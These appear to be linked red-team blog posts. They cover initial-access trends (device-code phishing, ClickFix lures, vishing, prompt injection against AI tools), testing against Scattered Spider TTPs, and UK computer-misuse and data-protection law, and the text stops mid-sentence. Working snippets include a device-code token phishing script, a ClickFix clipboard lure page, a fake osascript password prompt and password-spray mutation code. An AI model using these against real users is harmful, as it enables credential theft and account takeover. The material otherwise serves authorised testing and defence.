Having spent much of 2024 and 2025 focusing on initial access, I thought it might be useful to summarise recent public developments and techniques which have grown in popularity. This will focus heavily on initial access payloads and less on general OSINT techniques, though these still have a place!
Before we start, I wanted to call out the Initial Access Guide and BreakDev Red Discords, which have been a great source of inspiration and learning! In addition, there are some blogs and videos which I would strongly recommend for anyone interested in learning more about initial access and OSINT:
According to CrowdStrike, vishing increased in popularity by 442% in H2 2024, and Scattered Spider has performed several high-profile compromises leveraging vishing in various forms, highlighting how effective and flexible this technique can be. For example, it can suit a range of pretexts and levels of access whilst avoiding many of the detections which apply to other methods, such as EDR or mail filtering. Some of the commonly used pretexts include:
Vishing the IT Service Desk to obtain password and/or MFA resets for an account
Vishing a user directly to get them to reveal credentials, execute a payload or consent to a malicious OAuth application
Performing ‘internal’ vishing to escalate privileges or move laterally, if access has already been obtained
Combining phishing and vishing to increase the legitimacy of phishing emails
Some recent threat intelligence from Google suggests that UNC6040 has been using vishing in a different way. In their example, the attackers called end users whilst posing as members of IT support. On the call they would then ask the users to authorise a third-party application against their Salesforce instance, allowing for exfiltration of sensitive data through OAuth permissions. This is an interesting approach: by not relying on code execution or credential theft, detection is made even more challenging.
AI is often closely linked to vishing attacks, though at the time of writing there are not many good end-to-end examples of AI-powered vishing publicly available. Current models can handle pre-recorded or simplistic calls well, but struggle on more complex calls, especially when video content is required. It is likely just a matter of time until the models improve in capability, though!
Device Codes
Device codes have exploded in popularity recently, notably with Microsoft’s implementation being leveraged by threat actors. For those who don’t know, this flow allows attackers to generate a code which the victim enters into a legitimate site, such as https://microsoft.com/devicelogin. After the victim enters the code and authenticates with their account, the attacker is able to request access tokens as the victim from the service in question.
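To make this concrete, the whole flow can be driven with a couple of HTTP requests. Below is a minimal sketch against Microsoft’s endpoints, assuming Python and the requests library; the client ID shown is the widely documented Microsoft Office first-party client that appears throughout public device code research, so treat the specifics as illustrative rather than a finished tool.

```python
import time

import requests

TENANT = "common"
CLIENT_ID = "d3590ed6-52b3-4102-aee8-c89f32497585"  # widely documented Microsoft Office client ID
SCOPE = "openid profile offline_access"

# Step 1: request a device code and user code to deliver to the victim
flow = requests.post(
    f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/devicecode",
    data={"client_id": CLIENT_ID, "scope": SCOPE},
).json()
print(f"Send the victim to {flow['verification_uri']} with code {flow['user_code']}")

# Step 2: poll the token endpoint until the victim authenticates
# (codes expire after roughly 15 minutes, so the pretext needs to land quickly)
while True:
    time.sleep(flow["interval"])
    token = requests.post(
        f"https://login.microsoftonline.com/{TENANT}/oauth2/v2.0/token",
        data={
            "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
            "client_id": CLIENT_ID,
            "device_code": flow["device_code"],
        },
    ).json()
    if "access_token" in token:
        print("Access and refresh tokens issued for the victim's account")
        break
    if token.get("error") != "authorization_pending":
        raise SystemExit(token.get("error_description", "Flow failed or expired"))
```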
A number of services beyond Microsoft support this authentication flow, with some covered in separate blog posts:
There are a number of really interesting things you can do here to leverage device codes in payloads, but again that will have to wait!
FileFix/ClickFix
FileFix and ClickFix are two related techniques which trick end users into copying a command and pasting it into a location which will execute it. In the case of FileFix, this is generally the address bar of a File Explorer window; for ClickFix, it is generally either a terminal-style application or the Run dialog. Observed lures include the following (a minimal lure sketch follows the examples):
CloudFlare-styled ‘authentication’ requiring a command to be run
The reCAPTCHA example mentioned above
Various approaches where the target must ‘authenticate’ themselves by running a command
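To show the mechanics behind these lures, here is a heavily simplified sketch of a ClickFix-style page served with Python’s standard library. The page wording and the placeholder command are purely illustrative, and note that the browser clipboard API only works in a secure context (HTTPS or localhost) in a real deployment.

```python
# Hypothetical ClickFix-style lure: a fake 'verification' page that copies a
# command to the clipboard when the button is clicked.
from http.server import BaseHTTPRequestHandler, HTTPServer

PAGE = """<!doctype html>
<html><body>
<h2>Verify you are human</h2>
<button onclick="verify()">I'm not a robot</button>
<p id="steps" hidden>Press Win+R, then Ctrl+V, then Enter to complete verification.</p>
<script>
function verify() {
  // The 'verification' command the victim is told to paste into the Run dialog
  navigator.clipboard.writeText('powershell -w hidden -c "<payload here>"');
  document.getElementById('steps').hidden = false;
}
</script>
</body></html>"""

class LureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(PAGE.encode())

HTTPServer(("0.0.0.0", 8080), LureHandler).serve_forever()
```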
Whilst most blog posts focus on Windows, this is still an effective technique against Mac devices which haven’t been hardened against the various LOLBAS-style commands. Some example commands are covered by the Mac-specific ‘LOOBins’ project, and Delivr.to make specific mention of osascript being leveraged in campaigns.
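For example, a macOS ClickFix-style test might lean on osascript, one of the LOOBins-listed binaries, to pop a password prompt. A minimal sketch is below; the dialog wording is purely illustrative.

```python
# Minimal sketch: invoking osascript to display a password prompt, the pattern
# reported in macOS ClickFix-style campaigns. For detection testing only.
import subprocess

APPLESCRIPT = (
    'display dialog "Keychain verification required. Enter your password:" '
    'default answer "" with hidden answer with title "System Preferences"'
)

result = subprocess.run(
    ["osascript", "-e", APPLESCRIPT],
    capture_output=True, text=True,
)
# osascript prints the dialog result (including the typed text) to stdout
print(result.stdout.strip())
```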
macOS
macOS has, unusually, had several initial access techniques revealed in the past few months, with two talks by SpecterOps at SOCon covering new techniques:
These are particularly interesting, as they allow for more novel means of gaining initial access without relying on the classic usage of curl/wget and piping into bash or similar.
Additionally, a post by eSentire covered a campaign which used a DMG file to coerce users into dragging and dropping a file onto the Terminal, bypassing Gatekeeper. This technique does have several steps (and potential drawbacks), but it allows for a high degree of flexibility in payload delivery. A screenshot from their blog is below.
AI/Prompt Injection
An ‘emerging’ vector leverages prompt injection to poison the models of AI systems. As these systems and tools increasingly monitor more areas of our corporate lives, they are gaining the ability to read and parse a greater range of information. Naturally, if they are parsing attacker-controllable information, this can present some new avenues of attack. This is not news to anyone involved in cyber, but ‘in the wild’ examples beyond simple proofs-of-concept have been slow to emerge.
As with all AI-based attacks, this is unlikely to be resolved any time soon, especially with the growing demand for AI across applications and business use cases.
From https://0din.ai/blog/phishing-for-gemini
Credential Capture
Credential capture payloads continue to be a viable technique, though growing awareness of this approach does make it more challenging. Re-using any captured credentials increasingly requires attention to detail, to ensure the re-use is not caught by Conditional Access Policies or similar. Kuba Gretzky has delivered two really useful talks at x33fcon on this subject, focusing on evasion of defensive products, as well as some specific detections during the authentication process, such as CSS canaries.
Final Thoughts
Outside of the techniques mentioned above, a number of ‘older’ techniques are still highly effective and worth checking, such as credential re-use or stuffing attacks using stealer logs. Whilst perimeters are becoming increasingly secure, I commonly see exposed information in areas which are less heavily monitored by run-of-the-mill ASM solutions, for example credentials or internal terms within code-sharing sites such as GitHub, StackOverflow, personal blogs and so on. Thinking a little outside the box can often reveal unexpected findings and key information.
In terms of payload delivery, the LOTS Project remains a big player, cataloguing trusted services which can be exploited for a range of uses. Common business applications are also a versatile option, though ensure you are compliant with the provider’s terms and conditions if you are to use them! With the ongoing shift to SaaS and cloud-hosted solutions, companies are using an ever-expanding list of products and services, and often these services have their own pitfalls or potential to be leveraged by attackers.
Recently Scattered Spider (G1015) have been gaining attention for a range of attacks against UK retail, namely attacks against Marks and Spencer, Harrods and Co-op. These have led to extensive service disruption, with some firms able to limit the impact more than others. This is in addition to a range of attacks in previous years against telecommunications and Business Process Outsourcing (BPO) providers. Given the impact of the recent attacks against retail firms, other businesses understandably want to assess their defences against such attacks.
Threat Intelligence
To start, let’s summarise the TTPs of Scattered Spider from public threat intelligence sources, along with some ideas on how these can be tested safely. I will focus heavily on the initial stages of a Scattered Spider attack, as this is the typical focus for most companies, though reviewing the post-exploitation TTPs would also be advisable!
The report also lists Bring-Your-Own Vulnerable Driver (BYOVD) as a TTP, which could be considered for testing, or ensuring that BYOVD-specific controls are enabled, such as the corresponding ASR rule in MDE.
Google/Mandiant
A recent Mandiant report lists a range of TTPs which mirror the above, with a handy diagram (below) which shows a graphical mapping of the TTPs across the attack chain.
Notably there are a lot of other lower-skilled TTPs listed here, such as using Mimikatz and secretsdump.py, which should be readily detected by any EDR.
Following a successful vish or phish of a user, Scattered Spider were then observed performing more detailed OSINT on the targets, looking to identify potential answers to their security questions or to perform targeted SIM-swapping attacks.
From the above threat intelligence, several common approaches taken by Scattered Spider are clear, specifically around vishing and the widespread use of social engineering tactics. To assess this, several different attacks can be simulated through either a red or purple team exercise.
Vishing
The main TTP used by Scattered Spider appears to be the use of vishing to gain access to their targets. As part of this, the following could be tested:
Vishing the IT Support helpdesk to gain a password and/or MFA reset
This should include both a ‘standard’ and ‘privileged’ user as targets
Assess controls in place on video calling and internal messaging applications
Can an external Teams user directly message/call employees?
Are external tenants only able to communicate internally following approval?
Can the SOC correlate the activity from an IT helpdesk call with any malicious behaviour (i.e. MFA methods added or unusual account activity)?
Perform vishing attacks directly against high-profile or privileged users
Currently this is not listed by any public TI sources, but would be a logical next step for Scattered Spider TTPs
This would have to be carefully planned with considered guardrails and limitations to prevent causing harm or distress to any users.
Performing internal vishing (e.g. social engineering a user from the position of another internal user) can be challenging during a purple team exercise, due to the lack of technical controls which can be implemented to prevent otherwise legitimate behaviour. Instead, this can be somewhat simulated by attempting some of the ‘risky sign-in’ behaviour below, for example by simulating the theft of valid credentials and attempting to authenticate as a secondary account. This would simulate the stages before an internal vishing attack, as the attacker gains access to the internal environment.
Another approach could be to simulate a supply chain compromise from the position of a compromised IT provider/supplier, by configuring a separate (trusted) tenant and creating an account within it to simulate a third-party user or contractor. This could be a privileged account, or simply a ‘standard’ account, within a tenant that has a level of trust into the main tenant. Several tests could then be performed from the trusted into the trusting tenant:
Performing vishing and phishing attacks
Such as sharing a link to a credential capture portal, or sending various payloads via email or Teams
Throughout these TTPs, the behaviour of email and web filtering and gateway solutions should be checked for any discrepancies compared to the same behaviour performed from an ‘untrusted’ account.
Credential re-use onto SSO-enabled platforms such as Citrix, AVDs or other internal systems
Enumeration of shared cloud resources or internal data repositories
Credential Capture
Scattered Spider appear to make extensive use of credential capture sites, such as those created by Evilginx. These sites are often hosted using domains which mimic the brand being targeted, which could act as another point of detection. Some potential tests include:
Phishing using a credential capture lure
Sending credential capture payloads from a domain impersonating the target (e.g. auth-TARGET_NAME.com)
Assessing that alerts are raised following credential capture activity
Registering domains which impersonate the target to test brand protection controls and/or typo-squatting detections (a small permutation sketch follows this list)
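As a starting point for the domain registration tests, candidate names can be generated programmatically before being checked for availability. A small illustrative sketch is below; the target name and pattern lists are hypothetical and far from exhaustive, and dedicated tooling such as dnstwist goes much further.

```python
# Rough sketch: generating candidate impersonation domains for brand-protection
# testing. 'target' and the pattern lists are placeholders for illustration.
target = "target"  # hypothetical brand name

prefixes = ["auth-", "login-", "sso-", "mfa-"]
suffixes = ["-support", "-helpdesk", "-portal"]
tlds = [".com", ".net", ".co", ".io"]
swaps = {"o": "0", "l": "1", "e": "3"}  # simple homoglyph substitutions

candidates = set()
for tld in tlds:
    for p in prefixes:
        candidates.add(f"{p}{target}{tld}")
    for s in suffixes:
        candidates.add(f"{target}{s}{tld}")
    for char, sub in swaps.items():
        if char in target:
            candidates.add(f"{target.replace(char, sub)}{tld}")

for domain in sorted(candidates):
    print(domain)
```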
This can also blur into testing ‘risky sign-in’ activity, such as performing sign-ins from non-compliant hosts or those in unusual geographies. This can be performed by the following (a log-validation sketch follows the list):
Using VPSs in unusual geographies to simulate a foreign login
Testing ‘impossible travel’
Authenticating using an abnormal host or browser/user agent (e.g. Kali Linux, Firefox)
Authenticating following an MFA Fatigue attack (See later!)
Performing a secondary authentication whilst the user is legitimately signed in.
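For purple team runs of these tests, it is worth confirming that each simulated sign-in actually landed in the logs with the expected properties. A rough validation sketch using Microsoft Graph is below, assuming a token with the AuditLog.Read.All permission; the user and token values are placeholders.

```python
# Rough validation sketch: pulling recent Entra ID sign-in events via Microsoft
# Graph to confirm the simulated 'risky' sign-ins were recorded as expected.
import requests

TOKEN = "<access token>"  # placeholder: token with AuditLog.Read.All
USER = "targeted.user@example.com"  # the account used in the simulation

resp = requests.get(
    "https://graph.microsoft.com/v1.0/auditLogs/signIns",
    headers={"Authorization": f"Bearer {TOKEN}"},
    params={"$filter": f"userPrincipalName eq '{USER}'", "$top": "25"},
).json()

for event in resp.get("value", []):
    loc = event.get("location") or {}
    device = event.get("deviceDetail") or {}
    print(
        event.get("createdDateTime"),
        event.get("ipAddress"),
        loc.get("countryOrRegion"),
        device.get("operatingSystem"),
        event.get("riskLevelDuringSignIn"),
    )
```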
Credential Re-Use
Credential stuffing or re-use attacks appear to also be used by Scattered Spider, along with a number of other threat actors. Whilst this is a commonly used technique, there are several password spraying TTPs which are worth assessing:
Evaluate breach dumps and combolists for leaked credentials
Depending on the scope and appetite of the customer, performing more targeted OSINT into high profile or privileged users to identify passwords used on personal accounts could be performed – subject to approval!
Perform targeted password spraying using any leaked credentials, including potential modifications (e.g. London101! -> London102!; see the mutation sketch after this list)
Widespread password spraying using passwords relating to the company or industry
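A quick sketch of the kind of mutation logic involved, using the example above; real wordlist tooling applies far more rules than these.

```python
# Rough sketch: deriving spray candidates from a leaked password by applying
# the common habit of incrementing digits and rotating embedded years.
import re

def mutations(password: str) -> list[str]:
    candidates = []
    # Increment any trailing digit sequence: London101! -> London102!
    match = re.search(r"(\d+)(\W*)$", password)
    if match:
        digits, symbols = match.groups()
        bumped = str(int(digits) + 1).zfill(len(digits))
        candidates.append(password[: match.start()] + bumped + symbols)
    # Rotate the year if one is embedded: Summer2024! -> Summer2025!
    for year in re.findall(r"20\d{2}", password):
        candidates.append(password.replace(year, str(int(year) + 1)))
    # Common suffix variations
    base = re.sub(r"\W+$", "", password)
    candidates += [base + s for s in ("!", "1!", "123")]
    return sorted(set(c for c in candidates if c != password))

print(mutations("London101!"))  # example from the text
```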
With access to a valid account, a wider range of tests can be simulated as an assumed compromise-style test to assess the post-authentication controls:
Attempt to add phone/SMS-based MFA methods to an account (a Graph-based sketch follows this list)
If this succeeds, then perform MFA fatigue tests against the account.
Sign in using a non-compliant device
Attempt to perform typical early kill chain behaviour
Searching SharePoint/internal resources for passwords or internal data
Gathering of Teams and Outlook data
Add new MFA methods to the account
Change the password of the account
Follow the ‘Risky Sign In’ activity above
Evaluation of the current password policy and banned password phrases
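For the MFA method test specifically, Microsoft Graph exposes the authentication methods API, which makes the check easy to script. A rough sketch is below; the token is a placeholder delegated token for the test account (UserAuthenticationMethod.ReadWrite scope), and the phone number sits in the UK’s reserved fictional range.

```python
# Rough sketch: attempting to register a phone-based MFA method on the
# compromised test account, to check whether the action succeeds and whether
# it raises an alert in the SOC.
import requests

TOKEN = "<delegated access token>"  # placeholder
resp = requests.post(
    "https://graph.microsoft.com/v1.0/me/authentication/phoneMethods",
    headers={"Authorization": f"Bearer {TOKEN}"},
    json={"phoneNumber": "+44 7700900000", "phoneType": "mobile"},
)
# 201 = method added (potential control gap); 400/403 = blocked by policy
print(resp.status_code, resp.text)
```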
Remote Management and Monitoring (RMM)
Attempting to download and install various RMM tools on a corporate device should be sufficient to raise alerts, especially if the executable is not being installed via an approved method (e.g. Intune). CISA has a specific advisory on this, which contains additional information.
Attempt to run various commands through a provided console (if it has one) or through cmd/PowerShell.
Alerts could be raised at all points of these tests, though this can be challenging due to the executables potentially being allowed by policy, for example if AnyDesk is the corporate solution for screen sharing or client communications. It would also be a good exercise to ensure any actions performed via an RMM can be successfully attributed to an RMM session by the SOC/IR teams, rather than a more generic attribution to CLI activity.
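A quick way to baseline web-filtering coverage before the full install tests is simply to check which RMM vendor sites are reachable from a standard corporate host. A rough sketch is below; the domain list is illustrative only, and CISA’s advisory contains a fuller set of tools worth testing.

```python
# Rough sketch: checking whether common RMM vendor domains are reachable from
# a corporate host, as a quick proxy for web-filtering coverage.
import requests

RMM_DOMAINS = [
    "anydesk.com",
    "teamviewer.com",
    "atera.com",
    "screenconnect.com",
    "splashtop.com",
]

for domain in RMM_DOMAINS:
    try:
        resp = requests.get(f"https://{domain}", timeout=10)
        print(f"{domain}: reachable (HTTP {resp.status_code})")
    except requests.RequestException as exc:
        print(f"{domain}: blocked or unreachable ({exc.__class__.__name__})")
```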
Additional Considerations
Whilst the TI mentioned above lists a range of TTPs, it is also important to consider some of the emerging initial access tradecraft seen from other threat actors, such as device code phishing, ClickFix and Living Off Trusted Sites (LOTS). Whilst I don’t believe these have been publicly observed in use by Scattered Spider yet, given the success of such techniques it would be advisable to ensure they are also tested, as the TTPs in use may evolve!
A lot of this post focuses on technical controls and testing, but a number of potential tabletop scenarios could also be produced from this activity to ensure the correct processes are in place. For example:
How would a third-party compromise be handled in light of the recent breaches?
What would the process be for handling AiTM alerts being raised against a privileged IT account?
What would the response be if a mass password-spraying attack was observed from known Scattered Spider infrastructure?
Specific training or guidance for staff may be sensible given the uptick in active attacks from Scattered Spider recently. Training could focus on:
How to identify potential social engineering approaches, focusing on vishing specifically
How users can report suspicious internal messages or video calls
Raising awareness of current attacker trends, such as ClickFix
Recommendations
The FS-ISAC report and the Mandiant report have a range of recommendations on specific controls to be implemented, and would be a good starting point for any assurance activity.
Strap in for a thrilling ride of legal terms and jargon! Legal stuff is certainly not the reason most red teamers perform assessments, but it is a vital part of the role. I’ve wanted to learn more about the actual legal requirements behind why we do certain things, such as Rules of Engagement, so hopefully this will save some of the pain for others who are interested.
As with anything legal: this post is not official guidance, and always do your own research!
Computer Misuse Act (CMA)
The Computer Misuse Act 1990, or CMA, covers a range of legal areas, and is closely related to the Data Protection Act (DPA), which concerns the usage and protection of data. In this post I will try and summarise what the CMA is, what it covers and the potential impacts.
The CMA doesn’t define what a computer is, due to the potential for this definition to rapidly change. Instead, a computer is considered to be a device which can ‘store, process or retrieve information’.
A ‘Computer System’ is any “device or a group of interconnected or related devices, one or more of which, pursuant to a program, performs automatic processing of data”. ‘Computer Data’ is any “representation of facts, information or concepts in a form suitable for processing in a computer system, including a program suitable to cause a computer system to perform a function.”
The DPA defines personal data as any information relating to an identified or identifiable living individual.
Jurisdiction
Under section 4 of the CMA, liability for offences under sections 1, 3 or 3ZA requires proof of at least one ‘significant link’ with the ‘home country’ concerned (i.e. England and Wales). Notably this isn’t impacted if:
The accused isn’t in the home country at the time of the offence
The target of the CMA offence (e.g. the compromised host) isn’t in the home country
The technological activity which facilitated the offending merely passed through a server based in the home country
Therefore, if someone commits a crime under Sections 1, 3 or 3ZA whilst in a foreign country, they may still be liable for prosecution within the UK if they are a UK national or their activity would be illegal in their current country.
As defined in section 5, in relation to an offence under Section 3ZA, any of the following would constitute a ‘significant link’ with domestic jurisdiction:
That the accused was in the home country concerned at the time when s/he committed the unauthorised act (or caused it to be done);
That the unauthorised act was done in relation to a computer in the home country concerned;
That the unauthorised act caused, or created a significant risk of, serious damage of a material kind (within the meaning of that section) in the home country concerned.
As defined in section 6, even the act of conspiring to commit a crime under the CMA would be treated under the same ‘extended extra-territorial jurisdiction arrangements’. For example, you can be outside the UK whilst conspiring to commit a crime according to the CMA and still be liable for it within the UK.
Thresholds For Prosecution
The offence occurs when an individual causes a computer, which would include his own computer, to perform a function with intent to secure access.
This excludes simply having physical contact with a computer and the scrutiny of data without any interaction with a computer. Therefore the act of reading sensitive or confidential output or forms of eavesdropping are not crimes in themselves within the CMA.
The access to the program or data which the accused intends to secure must be ‘unauthorised’ access. Specifically:
There must be knowledge that the intended access was unauthorised; and
There must have been an intention to secure access to any program or data held in a computer.
The word ‘any’ indicates that the intent need not relate to the computer which the accused is operating at the time. Section 1(2) explains that the intent of the accused does not need to be directed at any particular program or data, meaning that an attacker who accesses a computer without any clear idea of what they will find there would still be liable.
This can mean that a lot of the specific detail is pushed to individual policies, such as acceptable use policies, when considering any testing or internal issues. Whilst these have no legal bearing, they would be a key consideration in cyber security testing. Cases such as DPP v Bignell [1998] 1 Cr App R8 highlight this, where police officers were found not guilty after requesting details for an individual without the permission to do so, despite having legitimate access to the PNC.
Offences
For cyber security professionals, the offences highlight why effective approval processes are so important for testing, with all of the offences relying on the offender gaining unauthorised access to a system, and knowing that said access is not approved.
Section 1: Unauthorised access to computer material
The maximum penalty for this offence is 2 years’ imprisonment, making it the most ‘basic’ offence within the CMA. It relates to access to a computer where that access is unauthorised and the offender knows this at the time of the offence.
Section 2: Unauthorised access with intent to commit or facilitate commission of further offences
The maximum penalty for this offence is 5 years’ imprisonment. This is somewhat of an extension to Section 1, due to the ‘further offences’ detail. An example could be obtaining access with a view to transferring money.
This further offence can be conducted at a separate time; it just requires the link between the two offences. The further offence may not even be technically feasible, but if it is attempted then the accused could still be liable for a Section 2 offence.
Section 3: Unauthorised Acts with intent to impair, or with recklessness as to impairing the operation of a computer
The maximum sentence for this offence is 10 years’ imprisonment. This covers acts such as DDoS or deliberate damage. Importantly, deliberate modification of data is not necessarily covered, unless it impacts the reliability or availability of the data.
The specific acts are set out in Section 3(2), covering directly causing or enabling the following impacts:
‘Impair’ the operation of a computer
Prevent or hinder access to any program or data on the computer
Impair the operation of any program or the reliability of any data
This doesn’t have to be a permanent impact; it can be temporary (Section 3(5))
Section 3ZA: Unauthorised acts causing, or creating risk of, serious damage
Section 41(2) of the Serious Crime Act 2015 inserted Section 3ZA into the CMA, with effect from 3 May 2015.
This covers causing, or creating a ‘significant’ risk of, ‘material’ damage. This again can be caused deliberately or ‘recklessly’.
The maximum sentence is 14 years, unless the offence caused or created a significant risk of serious damage to human welfare or national security (as defined within Section 3ZA), in which case a person guilty of the offence is liable to imprisonment for life.
This is intended to cover the most serious cases concerning Critical National Infrastructure (CNI), with a broad range of damage covered by this section. Damage is ‘material’ if it leads to any of the following (Sections 3ZA(2,3)):
Damage to human welfare in any place, specifically:
Loss to human life;
Human illness or injury;
Disruption of a supply of money, food, water, energy or fuel;
Disruption of a system of communication;
Disruption of facilities for transport; or
Disruption of services relating to health.
Damage to the environment of any place;
Damage to the economy of any country; or
Damage to the national security of any country.
Section 3A: Making, supplying or obtaining articles for use in offence under Section 1, 3 or 3ZA
The maximum sentence for this is two years’ imprisonment. The rationale behind the creation of this offence is the market in electronic malware or ‘hacker tools’, which can be used for breaking into, or compromising, computer systems. For this, an ‘article’ is any program or data held in electronic form. This is likely the section most relevant to red teamers, given the large number of people involved in the open-source community. Whilst it is unlikely that Section 3A offences would be charged against someone contributing to open-source projects, it is worth considering!
This covers a wide range of activity relating to committing an offence under Sections 1, 3 or 3ZA:
Someone making, adapting, supplying or offering to supply any ‘article’
This also includes obtaining an ‘article’ in order to supply or use it
This is based on some of the following criteria/guidance:
Has the article been developed primarily, deliberately and for the sole purpose of committing a CMA offence (i.e. unauthorised access to computer material)?
Is the article available on a wide scale commercial basis and sold through legitimate channels?
Is the article widely used for legitimate purposes?
Does it have a substantial installation base?
What was the context in which the article was used to commit the offence compared with its original intended purpose?
Public Interest
The Crown Prosecution Service (CPS) has a great summary of the considerations around public interest in any case being raised:
As always, the public interest in a case features heavily. For example, where there is sufficient evidence to meet the evidential test under the ‘Code for Crown Prosecutors’, the following Public Interest factors should be carefully considered:
The financial, reputational, or commercial damage caused to the victim(s);
The offence was committed with the main purpose of financial gain;
The level of sophistication used, particularly sophistication used to conceal or disguise identity (including masquerading as another identity to divert suspicion);
The victim of the offence was vulnerable and has been put in considerable fear or suffered personal attack, damage or disturbance;
The mental health, maturity and chronological age of the defendant at the time of the offence.
Data Protection Act
The Act came into force on 25 May 2018. It updates data protection laws in the UK, supplementing the General Data Protection Regulation (EU) 2016/679 (GDPR), implementing the EU Law Enforcement Directive (LED), and extending data protection laws to areas which are not covered by the GDPR or the LED.
The Act does not write the GDPR into UK law. The GDPR has direct effect in EU member states from 25 May 2018, which means the GDPR is already part of UK law. After the UK leaves the EU, the GDPR will be converted into UK law (with some amendments) under the European Union (Withdrawal) Act 2018.
Part 1 – Definitions
Several key terms are used within the DPA:
Personal Data: Any information relating to an identified or identifiable living individual. This definition does not include the extra detail in the GDPR, which goes on to define an ‘identifiable living individual’.
Identifiable Living Individual: A living individual who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data or an online identifier; or one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of the individual.
Processing: In relation to information, an operation or set of operations performed on information or sets of information, such as: collection, recording, organisation, structuring or storage; adaptation or alteration; retrieval, consultation or use; disclosure by transmission, dissemination or otherwise making available; alignment or combination; or restriction, erasure or destruction.
Data Subject: The identified or identifiable living individual to whom personal data relates.
Controller and Processor: Part 1 does not provide a single definition of controller and processor; instead it points to the relevant Chapter or Part of the Act for the specific definitions. As a general rule these mirror the GDPR: ‘controller’ means the natural or legal person who alone or jointly with others determines the purpose and means of the processing of personal data, and ‘processor’ means the natural or legal person who processes personal data on behalf of the controller.
Filing System: Any structured set of personal data which is accessible according to specific criteria, whether held by automated means or manually, and whether centralised, decentralised or dispersed on a functional or geographical basis.
The Applied GDPR: The GDPR as applied by Part 2 Chapter 3. In practice this means the Act extends GDPR standards to processing outside the scope of EU law, or processing outside the scope of the GDPR, other than processing covered by Part 3 (LED processing) or Part 4 (intelligence services processing).
LED (Law Enforcement Directive): Used where data is processed by competent authorities for law enforcement purposes.
Part 2 – Data Processing
Part 2 of the DPA sets out how data processing can occur, and is heavily linked to the implementation and support of GDPR. Whilst GDPR applied automatically due to EU membership at the time, it provides provision for member states to tailor the language to suit local laws and government. One example of this is DPA Part 2 Section 8, which more precisely implements GDPR Article 6(1)(e), detailing the specific government and public bodies which can process data.
Special Categories
Schedule 1 details the various conditions which permit processing of special categories of personal and criminal offence data:
Part 1 – Conditions relating to employment, health and research
For an employer to process data under this part, any controllers must have an appropriate policy document in place
For public health bodies to process data, it must be conducted under the responsibility of a health professional or other person who has a duty of confidentiality under enactment or law.
For research purposes, it must have a public interest and be in accordance with Article 89(1) GDPR (as supplemented by s19 of the Act)
Part 2 – Substantial public interest conditions
This includes a wide range of potential topics, but all must follow the same underlying principles of being limited and only what is necessary.
Part 3 – Additional conditions relating to criminal offence data
Part 4 – Appropriate policy document and additional safeguards
Should such data be processed, several further policy documents must be created, which must:
Explain how the controller complies with the data protection principles set out in Article 5 of the GDPR;
Explain the controller’s policies for the retention and erasure of personal data processed under the relevant condition; and
Be retained, reviewed and (if appropriate) updated by the controller and (if requested) made available to the Information Commissioner, until six months after the controller ceases carrying out the processing.
Where appropriate policy documentation is required, the controller’s records of processing activities (under Article 30 of the GDPR) must include:
Details of the relevant condition relied on;
How processing satisfies Article 6 of the GDPR (lawfulness of processing); and
Details of whether the personal data is retained and erased in accordance with the appropriate policy documentation (and if not the reasons why not).
Data Transfer
From the GDPR regulations:
The GDPR imposes a general prohibition on the transfer of personal data outside the EU, unless:
Article 45 – the transfer is based on an adequacy decision;
Article 46 – the transfer is subject to appropriate safeguards;
Article 47 – the transfer is governed by Binding Corporate Rules; or
Article 49 – the transfer is in accordance with specific exceptions. One of the specific exceptions is where the transfer of personal data outside the EU is necessary for important reasons of public interest (Article 49(1)(d)).
The GDPR doesn’t apply to all processing of personal data occurring in the UK. It doesn’t cover processing which is:
Outside the scope of EU law, such as immigration issues relating to third-country nationals on humanitarian grounds;
Outside the scope of the GDPR, such as ‘common foreign and security policy activities’ (Article 2(2)(b) GDPR), or manual unstructured processing of personal data held by an FOI public authority.
The Freedom of Information Act (FOIA) is mentioned a lot in this section; there are several key takeaways:
Unstructured data (i.e. paper records) is not subject to FOI requests, as this would be too onerous, though the general GDPR rules/principles still apply
Data previously reserved for LED usage can be shared so long as its usage is still relevant to its original purpose, whilst following the key pillars of GDPR; for example, sharing anonymised crime statistics to help reduce crime
Part 3 – Law Enforcement Processing
Part 3 regulates the processing of personal data by competent authorities for the purposes of “the prevention, investigation, detection or prosecution of criminal offences or the execution of criminal penalties, including the safeguarding against and the prevention of threats to public security” (together “law enforcement purposes”).
This Part implements the Law Enforcement Directive EU2016/680 (LED) into UK law, with additional provisions. The LED came into force in 2016, and EU member states had until May 2018 to adopt national legislation implementing its provisions.
Part 4 – Intelligence Services Processing
National security falls outside the scope of EU law. The activities of the UK intelligence services are therefore outside the scope of the GDPR and the LED. Part 4 of the Data Protection Act introduces a data protection regime applicable to processing of personal data by the intelligence services, such as The Security Service, the Secret Intelligence Service and the Government Communications Headquarters.
Part 5 – The Information Commissioner
The Information Commissioner is the UK’s national supervisory authority for the purposes of the GDPR, the LED and the Act, and shall continue to be the UK’s designated authority for the purposes of Convention 108.
Part 6 – Enforcement
The Information Commissioner has several powers as part of their role:
Information Notice
“To require someone to provide information that the Commissioner reasonably requires for her functions or for certain investigations”
The minimum period for compliance is 24 hours’ notice.
Assessment Notice
“To require a controller or processor to submit to an assessment as to data protection compliance”
The minimum period for compliance is 7 days’ notice.
Enforcement Notice
“To require a person to take the steps specified in the notice, or to require that a person refrains from taking certain steps.”
The minimum period for compliance is 24 hours’ notice.
Penalty Notice
“To require a person to pay to the Commissioner the amount specified in the notice.”
The minimum period for compliance is 28 days’ notice.
Each notice has various grounds on which a person does not have to comply, though most would not be applicable to red team exercises. The most relevant would be when the notice is withdrawn in writing. Outside of this, the following exceptions apply:
For Assessment Notices: where personal data is being processed for the special purposes
For Enforcement Notices: where the processing is for the special purposes, unless the Commissioner has issued a s174 determination and the court has granted leave for the notice
Fines
The maximum fines which can be levied follow the GDPR structure:
“the standard maximum amount”: the higher of 10,000,000 EUR or (in the case of an undertaking) 2% of the undertaking’s total annual worldwide turnover in the preceding financial year.
“the higher maximum amount”: the higher of 20,000,000 EUR or (in the case of an undertaking) 4% of the undertaking’s total annual worldwide turnover in the preceding financial year.
Legal Powers To Inspect
A warrant may be issued if a court judge is satisfied that there are reasonable grounds to suspect that a crime under the Act has been or is being committed, or that a person has failed, or is failing, to (in summary):
Comply with the data protection principles, data subject rights and controller/processor obligations set out in the GDPR or the Act;
Communicate a personal data breach to the Information Commissioner or a data subject; or
